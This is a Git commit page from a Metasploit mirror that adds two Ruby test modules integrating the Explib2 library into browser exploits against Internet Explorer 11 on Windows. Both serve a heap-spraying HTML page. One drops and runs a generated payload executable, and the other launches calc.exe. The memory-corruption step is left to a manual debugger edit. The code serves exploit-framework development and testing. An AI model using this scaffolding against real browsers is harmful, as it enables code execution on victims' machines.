infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add test modules

bug/bundler_fix
jvazquez-r7 2014-03-28 11:09:10 -05:00
parent 8f1e55de5a
commit 04bfe55ae0
2 changed files with 173 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

89
test/modules/exploits/test/explib2_ie11_drop_exec_test_case.rb Normal file
View File

@ -0,0 +1,89 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::BrowserExploitServer
include Msf::Exploit::EXE
def initialize(info={})
super(update_info(info,
'Name' => "Explib2 Drop Exec Test Case",
'Description' => %q{
This module allows to test integration of Explib2 into metasploit.
},
'License' => MSF_LICENSE,
'Author' =>
[
'guhe120', # Original explib2 author
'juan vazquez'
],
'References' =>
[
[ 'URL', 'https://github.com/jvazquez-r7/explib2' ],
],
'Platform' => 'win',
'BrowserRequirements' =>
{
:source => /script/i,
:os_name => OperatingSystems::WINDOWS,
:ua_name => HttpClients::IE,
:ua_ver => '11.0'
},
'Targets' =>
[
[ 'Automatic', { } ]
],
'DisclosureDate' => "Mar 28 2014",
'DefaultTarget' => 0))
end
def exploit_html
exe_js = Rex::Text.to_unescape(generate_payload_exe, ENDIAN_LITTLE, "\\u")
template = %Q|<html>
<head>
<script>
<%= js_explib2_payload("drop_exec") %>
</script>
<script>
<%= js_explib2 %>
</script>
</head>
<body>
<script>
var pe_exe = "<%= exe_js %>"
var num_arrays = 98688;
var arr_size = (0x1000 - 0x20)/4;
var explib = new ExpLib( num_arrays, arr_size, 0x1a1b3000, new payload_drop_exec(pe_exe) );
explib.spray();
/*
* Modify array length
* In the real world exp, you need to modify the array length field with your vulnerability
*/
alert( 'Execute the command in windbg: "ed 1a1b3000+18 400"' );
explib.go();
</script>
</body>
</html>
|
return template, binding()
end
def on_request_exploit(cli, request, target_info)
send_exploit_html(cli, exploit_html)
end
end

84
test/modules/exploits/test/explib2_ie11_exec_test_case.rb Normal file
View File

@ -0,0 +1,84 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info={})
super(update_info(info,
'Name' => "Explib2 Exec Test Case",
'Description' => %q{
This module allows to test integration of Explib2 into metasploit.
},
'License' => MSF_LICENSE,
'Author' =>
[
'guhe120', # Original explib2 author
'juan vazquez'
],
'References' =>
[
[ 'URL', 'https://github.com/jvazquez-r7/explib2' ],
],
'Platform' => 'win',
'BrowserRequirements' =>
{
:source => /script/i,
:os_name => OperatingSystems::WINDOWS,
:ua_name => HttpClients::IE,
:ua_ver => '11.0'
},
'Targets' =>
[
[ 'Automatic', { } ]
],
'DisclosureDate' => "Mar 28 2014",
'DefaultTarget' => 0))
end
def exploit_html
template = %Q|<html>
<head>
<script>
<%=js_explib2_payload%>
</script>
<script>
<%=js_explib2%>
</script>
</head>
<body>
<script>
var num_arrays = 98688;
var arr_size = (0x1000 - 0x20)/4;
var explib = new ExpLib( num_arrays, arr_size, 0x1a1b3000, new payload_exec('calc.exe') );
explib.spray();
/*
* Modify array length
* In the real world exp, you need to modify the array length field with your vulnerability
*/
alert( 'Execute the command in windbg: "ed 1a1b3000+18 400"' );
explib.go();
</script>
</body>
</html>
|
return template, binding()
end
def on_request_exploit(cli, request, target_info)
send_exploit_html(cli, exploit_html)
end
end